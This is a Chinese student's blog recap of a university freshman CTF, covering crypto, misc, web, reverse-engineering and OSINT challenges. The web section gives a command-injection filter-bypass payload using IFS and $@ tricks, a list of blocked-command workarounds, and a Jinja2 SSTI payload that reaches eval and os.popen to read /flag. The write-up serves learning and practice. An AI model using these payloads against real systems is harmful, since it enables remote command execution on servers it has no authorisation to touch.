<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>XJU1024CTF总结 | LiangMaxwell's Blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/friends/"><span class="navItemTitle">Friends</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>XJU1024CTF总结</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2021-10-28T09:23:59.000Z" id="date"> 2021-10-28</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-04-22T10:59:47.940Z" id="updated"> 2023-04-22</time></div></span><br><span>Word Count: <div class="control">1.7k</div></span><br><span>Read Time: <div class="control">6 min</div></span></div></div><hr><div id="post-content"><h1 id="XJUSEC总结"><a href="#XJUSEC总结" class="headerlink" title="XJUSEC总结"></a>XJUSEC总结</h1><p>前几天在机缘巧合下参加了新疆大学的新生赛，题目不算难，但是有一些没了解过的新东西，导致没有AK，于是用这个记录一下新学到的知识</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="1-垃圾邮件"><a href="#1-垃圾邮件" class="headerlink" title="1.垃圾邮件"></a>1.垃圾邮件</h3><p>这是唯一一个没写出来的密码题，题目给了一个垃圾邮件，里面的关键内容是一个用作密码的txt，藏flag的word，看了官方题解才知道这个是垃圾邮件密码，将信息藏到一段文字之中。解密的网站在<a target="_blank" rel="noopener" href="https://www.spammimic.com/encode.shtml">这里</a> </p>
<p>这个网站可以对一些空格，垃圾文本进行加密解密，首先用txt的空格解出密码，然后把word的文章复制上去解出来flag。</p>
<p>评价：很容易误解为white space 隐写，几乎是唯一解，而且相对冷门。</p>
<h3 id="2-日历密码"><a href="#2-日历密码" class="headerlink" title="2.日历密码"></a>2.日历密码</h3><p>之前听说过，这次也是第一次见，题目特征非常明显，一张日历截图和类似这样的密文</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">S21 F1 T12 T11 T22 M1 F1 M3<br></code></pre></td></tr></table></figure>

<p>其中M T1 W T2 F S1 S2 对应周一到周日，后面的数字是第几天，然后将日期与26个字母表对照即可</p>
<h3 id="3-标准银河密码"><a href="#3-标准银河密码" class="headerlink" title="3.标准银河密码"></a>3.标准银河密码</h3><p>题目给了一张MC的附魔台的截图，稍有常识的人就能看出来MC使用的是标准银河密码，与之对照即可</p>
<h3 id="4-ROT全家桶"><a href="#4-ROT全家桶" class="headerlink" title="4.ROT全家桶"></a>4.ROT全家桶</h3><p>之前使用的大多是ROT13，这次也了解到了还有ROT5  ROT18  ROT47</p>
<p>贴个<a target="_blank" rel="noopener" href="https://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php">在线网站</a></p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="1-按键音破解"><a href="#1-按键音破解" class="headerlink" title="1.按键音破解"></a>1.按键音破解</h3><p>在某一题中用到了，之前下载软件时里面装了一个按键音破解，这次派上用场了</p>
<h3 id="2-修改文件头"><a href="#2-修改文件头" class="headerlink" title="2.修改文件头"></a>2.修改文件头</h3><p>这题没写出来是我想复杂了，一眼看出来zip的文件头不对，但是误以为是删除了文件头，需要通过文件尾（504B0102）字段倒推出来文件头(504B0304)字段再加到前面，结果是修改了文件头233333</p>
<h3 id="3-excel"><a href="#3-excel" class="headerlink" title="3.excel"></a>3.excel</h3><p>excel和word文档的本质都是压缩包，将其改名解压后直接在XML中Ctrl F 搜索就能找到flag</p>
<h3 id="4-macro-mrf文件"><a href="#4-macro-mrf文件" class="headerlink" title="4.macro  mrf文件"></a>4.macro  mrf文件</h3><p>这次第一次见到了鼠标宏文件，记录鼠标的轨迹，比如画出flag，安装相关软件就能复现鼠标轨迹看到flag</p>
<h3 id="5杂题"><a href="#5杂题" class="headerlink" title="5杂题"></a>5杂题</h3><p>另外几道没写出来的题都是想复杂了，一个是在图片的16进制格式中直接查找flag，以为是什么高级隐写：数字水印，双图嵌套，缩略图隐写，高度宽度等qwq，还有一个是在流量包中分离出Base64格式的图片，将其修改高度就行，找到图片之后没想到。</p>
<p>顺便贴个好玩的<a target="_blank" rel="noopener" href="https://harrynull.tech/cipher/">网站</a></p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="1-rce漏洞"><a href="#1-rce漏洞" class="headerlink" title="1.rce漏洞"></a>1.rce漏洞</h3><p>给出的题目如下所示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$rce</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;rce&#x27;</span>];<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$rce</span>)) &#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\&gt;|\&lt;|\&#x27;|\&quot;/i&quot;</span>, <span class="hljs-variable">$rce</span>)) &#123;<br>        <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$rce</span>);<br>    &#125;<span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;hhhhhhacker!!!&quot;</span>.<span class="hljs-string">&quot;\n&quot;</span>;<br>    &#125;<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>读文件的命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs shell">more:一页一页的显示档案内容<br>less:与 more 类似<br>head:查看头几行<br>tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示<br>tail:查看尾几行<br>nl：显示的时候，顺便输出行号<br>od:以二进制的方式读取档案内容<br>vi:一种编辑器，这个也可以查看<br>vim:一种编辑器，这个也可以查看<br>sort:可以查看<br>uniq:可以查看<br>file -f:报错出具体内容<br>sh /flag 2&gt;%261 //报错出文件内容<br></code></pre></td></tr></table></figure>

<p>空格被过滤</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">&lt; 、&lt;&gt;、%09(tab键)、%20、$IFS$9、$IFS$1、$&#123;IFS&#125;、$IFS等，还可以用&#123;&#125; 比如 &#123;cat,flag&#125;<br></code></pre></td></tr></table></figure>

<p>关键字绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1.利用转义符号： 将flag写为/fl\ag，但很多情况下都没有用<br>2.拼接法：a=fl;b=ag;cat$IFS$a$b ，但这里过滤了cat和；所以不适用<br>3.使用空变量$*和$@，$x,$&#123;x&#125;绕过 题目中并没有过滤$和@尝试发现得出flag<br></code></pre></td></tr></table></figure>

<p>可以看出题目是将一些常见的读取命令给过滤掉，同时还过滤了空格和flag，所以最后的payload是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">rce=uniq$&#123;IFS&#125;fl$@ag.php<br></code></pre></td></tr></table></figure>

<h3 id="2-php数组溢出"><a href="#2-php数组溢出" class="headerlink" title="2.php数组溢出"></a>2.php数组溢出</h3><p>这一题其他的内容就不贴出来了，是一些常规的md5绕过和反序列化绕过_wakeup，其中我第一次见到的是下面这个（可见我的孤陋寡闻）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-variable">$array</span>[<span class="hljs-variable">$d</span>--] = <span class="hljs-number">1</span>) &#123;<br>            <span class="hljs-keyword">if</span> (<span class="hljs-variable">$array</span>[] = <span class="hljs-number">1</span>) &#123;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;wrong&#x27;</span>;<br>            &#125; <span class="hljs-keyword">else</span> &#123;<br>                <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;flag&#x27;</span>]);<br><br>            &#125;<br>        &#125;<br></code></pre></td></tr></table></figure>

<p>这个用到了PHP数组key溢出：<br>PHP的int型数据取值范围，与操作系统相关，32位系统上为2的31次⽅，即-2147483648到2147483647， 64位系统上为2的63次⽅，即-9223372036854775808到9223372036854775807。</p>
<p>当数组下标达到了9223372036854775807，这个时候想要再往⾥⾯插⼊元素，就会报错，<br><code>var_dump</code>之后 返回⼀个<code>NULL</code>，就能绕过这个判断</p>
<h3 id="3-SSTI"><a href="#3-SSTI" class="headerlink" title="3.SSTI"></a>3.SSTI</h3><p>最简单的SSTI模板题，使用的是官方给的漏洞复现就能找到flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;% <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;<br>&#123;% <span class="hljs-keyword">if</span> c.__name__ == <span class="hljs-string">&#x27;catch_warnings&#x27;</span> %&#125;<br>  &#123;% <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> c.__init__.__globals__.values() %&#125;<br>  &#123;% <span class="hljs-keyword">if</span> b.__class__ == &#123;&#125;.__class__ %&#125;<br>    &#123;% <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;eval&#x27;</span> <span class="hljs-keyword">in</span> b.keys() %&#125;<br>      &#123;&#123; b[<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&#x27;__import__(&quot;os&quot;).popen(&quot;cat /flag&quot;).read()&#x27;</span>) &#125;&#125;<br>    &#123;% endif %&#125;<br>  &#123;% endif %&#125;<br>  &#123;% endfor %&#125;<br>&#123;% endif %&#125;<br>&#123;% endfor %&#125;<br><br></code></pre></td></tr></table></figure>

<p>之前常见的一些题目都是PHP这个“漏洞百出“的语言，而且漏洞差不多已经被开发完毕了（，之后会有更多的Java web，flask，node.js这种web题，还需要不断学习</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="1-8086"><a href="#1-8086" class="headerlink" title="1.8086"></a>1.8086</h3><p>见识到了富有年代感的16位程序，这个需要在IDA中查看汇编代码，通过读汇编可以看出是对已经储存的字符异或1F，用脚本可以须臾解出。</p>
<h3 id="2-数织"><a href="#2-数织" class="headerlink" title="2.数织"></a>2.数织</h3><p>逆向的核心就是读伪代码&#x2F;汇编来明白程序要干什么，之前的一道题是前20行的杨辉三角，那个模型还是比较熟悉的（C语言第一课了属于是），看了官方题解才知道这一题的核心是数织游戏的<a target="_blank" rel="noopener" href="https://cn.puzzle-nonograms.com/">规则</a>,读出大致的数织图形就能找到flag，虽然之前看沃玛在微博发过她自制的数织游戏，但没想到能出道RE题里orz</p>
<h2 id="Osint"><a href="#Osint" class="headerlink" title="Osint"></a>Osint</h2><p>情报社工题</p>
<h3 id="1-航班"><a href="#1-航班" class="headerlink" title="1.航班"></a>1.航班</h3><p>土狗没坐过飞机，不知道有可以查历史航班的免费软件 ——飞常准，是我孤陋寡闻了。</p>
<h3 id="2-音频倒放"><a href="#2-音频倒放" class="headerlink" title="2.音频倒放"></a>2.音频倒放</h3><p>稍有常识的人就能准确地听出来音频是倒放还是正放（</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p><strong>求知若渴 虚心若愚</strong></p>
<p>（还有不要想太多🤡🤡🤡🤡🤡）</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2022/01/12/android-studio-lian-jie-ye-shen-mo-ni-qi/">← Next Android Studio连接夜神模拟器</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2021/10/14/chive-qiu-ji-xin-sheng-sai-web/">Chive秋季新生赛web题解 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">凉彧Maxwell</a></h1><div id="description"><p>凉彧のBlog</p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XJUSEC%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">XJUSEC总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Crypto"><span class="toc-number">1.1.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%9E%83%E5%9C%BE%E9%82%AE%E4%BB%B6"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.垃圾邮件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%97%A5%E5%8E%86%E5%AF%86%E7%A0%81"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.日历密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%A0%87%E5%87%86%E9%93%B6%E6%B2%B3%E5%AF%86%E7%A0%81"><span class="toc-number">1.1.3.</span> <span class="toc-text">3.标准银河密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-ROT%E5%85%A8%E5%AE%B6%E6%A1%B6"><span class="toc-number">1.1.4.</span> <span class="toc-text">4.ROT全家桶</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Misc"><span class="toc-number">1.2.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%8C%89%E9%94%AE%E9%9F%B3%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.2.1.</span> <span class="toc-text">1.按键音破解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E4%BF%AE%E6%94%B9%E6%96%87%E4%BB%B6%E5%A4%B4"><span class="toc-number">1.2.2.</span> <span class="toc-text">2.修改文件头</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-excel"><span class="toc-number">1.2.3.</span> <span class="toc-text">3.excel</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-macro-mrf%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.4.</span> <span class="toc-text">4.macro  mrf文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E6%9D%82%E9%A2%98"><span class="toc-number">1.2.5.</span> <span class="toc-text">5杂题</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-number">1.3.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-rce%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.3.1.</span> <span class="toc-text">1.rce漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-php%E6%95%B0%E7%BB%84%E6%BA%A2%E5%87%BA"><span class="toc-number">1.3.2.</span> <span class="toc-text">2.php数组溢出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-SSTI"><span class="toc-number">1.3.3.</span> <span class="toc-text">3.SSTI</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RE"><span class="toc-number">1.4.</span> <span class="toc-text">RE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-8086"><span class="toc-number">1.4.1.</span> <span class="toc-text">1.8086</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%95%B0%E7%BB%87"><span class="toc-number">1.4.2.</span> <span class="toc-text">2.数织</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Osint"><span class="toc-number">1.5.</span> <span class="toc-text">Osint</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E8%88%AA%E7%8F%AD"><span class="toc-number">1.5.1.</span> <span class="toc-text">1.航班</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E9%9F%B3%E9%A2%91%E5%80%92%E6%94%BE"><span class="toc-number">1.5.2.</span> <span class="toc-text">2.音频倒放</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.6.</span> <span class="toc-text">总结</span></a></li></ol></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>